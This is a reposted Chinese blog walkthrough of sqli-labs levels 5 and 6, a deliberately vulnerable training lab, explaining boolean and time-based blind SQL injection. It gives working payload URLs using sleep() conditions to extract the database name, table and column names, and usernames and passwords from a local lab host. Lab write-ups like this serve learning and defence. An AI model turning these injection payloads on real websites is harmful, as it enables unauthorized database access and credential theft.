首页 > 数据库技术 > 详细

sqli-labs第5-6关 详解

时间:2020-10-10 09:43:36      阅读:38      评论:0      收藏:0      [点我收藏+]

先打开第五关,我们尝试sql盲注

先看一个例子吧

某公司有一个站点,有一个showProduct.php页面,该页面接受名为ID的参数,该参数可唯一标识web站点上的每一件商品。访客可以按下列方式请求页面:

http://showProduct.php?id=1

http://showProduct.php?id=2

http://showProduct.php?id=3

http://showProduct.php?id=4

每个请求将显示顾客希望看到的商品数据,为保护数据库不向用户显示任何数据库错误,下列所有请求均显示第一件商品:

http://showProduct.php?id=1‘ or and 1=1

http://showProduct.php?id=attacker‘

http://showProduct.php?id=-1

到目前为止,我们能看到这公司考虑到了安全性问题,但是我们继续推理过程

http://showProduct.php?id=2 or 1=1  //返回了第1件商品

http://showProduct.php?id=2 or 1=2  //返回了第2件商品

在第一个请求中,or 1=1让数据库返回所有商品。数据库检测该语句异常,显示第1件商品。

在第二个请求中,or 1=2对结果没有影响,所以显示第2件商品

不难发现,我们可以根据相同的原理对攻击做一些变化,例如,可以选择and逻辑运算符来替换or。这样一来

http://showProduct.php?id=2 and 1=1  //返回了第2件商品

http://showProduct.php?id=2 and 1=2  //返回了第1件商品

现在虽然可以操作SQL查询,但是却无法从中获取数据。此外,web服务器根据发送的条件回发不同的相应。我们据此可以确认SQL盲注的存在,并开始着手利用此漏洞。

了解这个了,我们来到sqli-labs第5关 学习一下,sql盲注

我们无法跟前4道题一样,发现没有回显出来用户名和密码,于是我们进行如下

?id=1‘ and 1=1--+

?id=1‘ or 1=2--+

用and连接条件时,  如果条件为真,则回显You are in...........

        如果条件为假,则没有回显。

用or连接条件时,    如果条件为假,则回显You are in...........

         如果条件为真,则没有回显。

用着两种pyload都可以,我这里采用and运算符了。

第一步我们先猜解库名的长度吧,利用延时注入,因为盲注一般页面时没有回显的,所以我们采用延时,当然这道题是有回显的

我们按照延时注入操作:

当我们测试长度为8时,出现了明显延时,所以我们确定数据库名为8个长度

http://192.168.199.132/sqli-labs/Less-5/?id=1‘ and if(length(database())=8,sleep(5),1)--+

数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(database(),8)=‘security‘

http://192.168.199.132/sqli-labs/Less-5/?id=1‘ and if(left(database(),1)=‘s‘,sleep(5),1)--+

爆表名:

http://192.168.199.132/sqli-labs/Less-5/?id=1‘ and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)=‘users‘,sleep(5),5)--+

经过漫长的手注,我们就在limit 3,1中找到了表名 users

爆列名:

http://192.168.199.132/sqli-labs/Less-5/?id=1‘ and if(left((select column_name from information_schema.columns where table_name=‘users‘ limit 4,1),8)=‘password‘,sleep(5),1)--+

首先尝试定向爆破,以提高手工注入速度,修改limit x,1 中的x查询password是否存在表中,lucky的是limit 3,1的时候查到了password列,同样的方法查询username ,又一个lucky,接下来爆破字段的值。

爆破值payload:

http://192.168.199.132/sqli-labs/Less-5/?id=1‘ and if(left((select password from users order by id limit 0,1),4)=‘dumb‘,sleep(5),1)--+

http://192.168.199.132/sqli-labs/Less-5/?id=1‘ and if(left((select username from users order by id limit 0,1),4)=‘dumb‘,sleep(5),1)--+

按照id排序,这样便于对应。注意limit 从0开始.通过坚持不懈的尝试终于爆破到第一个用户的名字dumb,密码dumb,需要注意的是,mysql对大小写不敏感,所以你不知道是Dumb 还是dumb。

这个wp写的我手发慌,但是理解了这个盲注,学会了新姿势,但是这种重复性的工作,我们交给sqlmap做。

sqlmap怎么跑请参考https://www.cnblogs.com/junlebao/p/13758919.html第二种方法就是sqlmap跑出来的。

第6关和第五关类似:

双引号字符型注入,上一题的单引号改成双引号就可以了,同样是两种方法:时间延迟型的手工盲注、报错型的手工盲注或者sqlmap

例子是,来自《注入攻击与防御(第2版)》这本书。题是sqli-labs中的。

sqli-labs第5-6关 详解

原文:https://www.cnblogs.com/junlebao/p/13789655.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!